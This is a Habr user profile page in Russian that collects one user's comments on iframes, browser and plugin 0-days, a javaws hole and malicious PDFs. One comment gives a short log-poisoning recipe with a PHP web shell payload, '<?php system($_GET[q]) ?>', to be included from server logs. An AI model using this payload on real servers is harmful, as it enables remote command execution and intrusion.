All streams
Search
Write a publication
Pull to refresh
50
0
Антон Кирсанов @akirsanov

User

Send message
да-да, ведь именно вы не такой как все, %username%!
И Кстати ифреймы юзать в контентных частях не зло.
Зло применять инструменты без понимания, как оно работает. Инструмент не может быть злом. Молоток и не злой и не добрый, он просто есть. В руках маньяка он орудие убийства, в руках доброго строителя — отличный помощник, решающий свою задачу.
какой контекст? это ответ комментарий habrahabr.ru/blogs/infosecurity/95513/#comment_2916955
Назовите пару известных почтовых сервисов, которые используют фреймы/ифреймы?
ответ — gmail. Этого мало? Новые условия придумываете?
Вы, прежде чем умничать, на gmail зайдите и посмотрите фаербагом.
5 iframe тегов.
Магические константы это плохо. Особенно плохо(при наличии оного) вместо первичного источника данных — ориентации экрана, упираться на следствие — ширину или высоту.
В сети периодически всплывают 0day уязвимости не только в браузерах, но и в различных плагинах — acrobat reader, java, qucktime, realplayer — это наиболее популярные что были в последнее время. Живут они мало, но в период отсутствия патча (от неск. дней до месяца обычно) в сети действительно опасно ходить на непроверенные сайты. Да и на проверенные опасно, поэтому на сайтах, посвященных сетевой безопасности выкладываются экстренные рекомендации по «патчу» уязвимости, зачастую простым отключением этого компонента.
А люди всегда пишут «у меня самый защищенный компьютер, самая защищенная ось, обновленный антивирус, да я как в танке». Но в разных странах от 5 до 30% траффика уязвимы, а это те же самые люди.
вот вы и уязвимы.
Я не думаю что вы понимаете о чем пишите.
Жертве посылается ссылка, самая простая ссылка, а перейдя по ней, не на сервере гугла, а на сервере злоумышленника, находится набор эксплоитов под браузеры и плагины.
А я думаю ноги растут из уязвимости javaws, которую только закрыли.
www.javatester.org/version.html

Всем кто пострадал от взлома, зайдите и напишите версию java, например 1.6.0_20
потому что код на сайте, на который ведёт ссылка.
Находите логи вебсервера, дергаете запрос host/?<?php system($_GET[q]) ?>, инклудите лог, PROFIT!
В свете последних событий (активный рост эксплуатирования вредоносных PDF в сети) так и хочется посоветовать не юзать PDF вообще.
PoC не срабатывает, видимо STDU Viewer не обрабатывает /Launch /Action

Information

Rating
Does not participate
Location
Бишкек, Кыргызстан, Кыргызстан
Registered
Activity